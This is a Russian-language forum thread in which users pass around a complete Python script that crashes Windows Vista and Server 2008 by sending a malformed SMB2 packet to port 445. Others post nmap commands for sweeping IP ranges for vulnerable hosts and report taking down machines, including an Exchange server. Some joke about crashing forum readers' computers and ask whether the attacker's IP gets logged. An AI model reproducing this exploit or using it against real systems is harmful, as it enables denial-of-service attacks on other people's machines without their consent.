Нытик-пост...

В Линуксе другая, менее неприятная дырка: куча триального и некоммерческого софта имеют версии и под винду, и под Линукс. Так вот первые работают даже под вайном, а последние... и петиции об открытии кода никто писать не хочет.

Не, не троллю.

Что то не работает... проверил на трёх машинах (((

для Ї:

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

> Что то не работает... проверил на трёх машинах (((

Там вместо IP_ADDR надо айпишник писать, есличо.

Подскажите аналог LanScope, а то как-то не кошерно бсодить виндовые машины, используя вендвую прогу для нахождения SMB.

nmap вообще-то.

nmap

Ща поставлю в виртуалбокс симерко и заценю, не дай бог работает, вистаманы и 7лузеры из БСОДа сегодня не выйдут.

Подскажите как найти SMB2 на NT6 в диапазоне 10.0.1.0-10.0.20.0

> не дай бог работает, вистаманы и 7лузеры из БСОДа сегодня не выйдут.

Ты подожди.. Модераторам, и JB в том числе, ведь видно и UA и IP?
А можно запросить мониторинг вылета пользователей с ЛОРа? ;)

рецепт nmap -O -p 192.168.1.0/24

смотрим где есть 445 open и Vista

Вроде работает. По крайней мере та машина перестала пинговаться.

Охохо, новая самба -- новые баги.

nmap -A -T4 10.0.1-20.*

> Ты подожди.. Модераторам, и JB в том числе, ведь видно и UA и IP?

JB не модератор :)

> А можно запросить мониторинг вылета пользователей с ЛОРа? ;)

Эта идея уже пришла мне в голову :))))

>Вроде работает. По крайней мере та машина перестала пинговаться.

работает. самое веселое - ставишь пинг. как пошел, запускаешь питон скрипт снова

жалко xp/2003 не кладет, но все равно спасибо

This is so fukken Epic!

цшт2008 кладёт? :)

> Там вместо IP_ADDR надо айпишник писать, есличо.

да этт я догадался, шары то же повключал...ноль эмоций :(

пропустил выше, правильно так nmap -O -p 445 192.168.1.0/24

нужно искать открытые 445 порты

Но синего экрана нет?

>нужно искать открытые 445 порты

один порт нет смысла сканить, фингерпринт получается нечеткий.

>цшт2008 кладёт? :)

по ссылке пишут что да

п если все порты, то слишком долго

Секлаб еще отзывается? :)

>Но синего экрана нет?

есть

Interesting ports on 10.0.0.37:
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
1110/tcp  open  nfsd-status
2869/tcp  open  unknown
19780/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
Running: Microsoft Windows Vista|2008
OS details: Microsoft Windows Vista SP0 or SP1, or Windows Server 2008

куча портов, 445 нету. фаервол?

Насколько я знаю через интернет не сработает?

Есть :)

ну ясен пень что по инету не сработает. даже исходя из принципа работы самой самбы.

Жалко (

а под 7 оно работает?

попробуй соедениться, у меня с закрытм 445 просто говорит connection timeout

>ну ясен пень что по инету не сработает. даже исходя из принципа работы самой самбы.

почему? если самба висит на инет интерфейсе, как в большинстве случаев в винде по умолчанию сделано

а у меня сразу refused

7исты кстати боятся обновляться, m$ обещала заблокировать крякнутые версии.

> 7исты кстати боятся обновляться, m$ обещала заблокировать крякнутые версии.

покойтесь с миром

Насрать

Мне хацкиры доставляют которые отрубание обновлений называют твиком, а потом вопросы "А почему у меня звук и интернет пропадают".

пробовал на семерке и ничего )

Ты что тут забыл?

Попробовал на windows 7 натравить. Ноль реакции.

Версия какая?

Короче, надо на главную и тэг "история успеха"

7600

А как это внешне выглядит, со стоны клиента?
И фиксируется ли, с какого айпи пришел лучъ поноса?

2008 сервер с ексчейнджом положыло сразу а семерка нифига ))))

>2008 сервер с ексчейнджом положыло сразу

А вот это серьезней.

>А как это внешне выглядит, со стоны клиента?

синий экран с белыми буквами с ошибкой PAGE_FAULT_IN_NONPAGED_AREA

думаю что никакой ip там не записывается.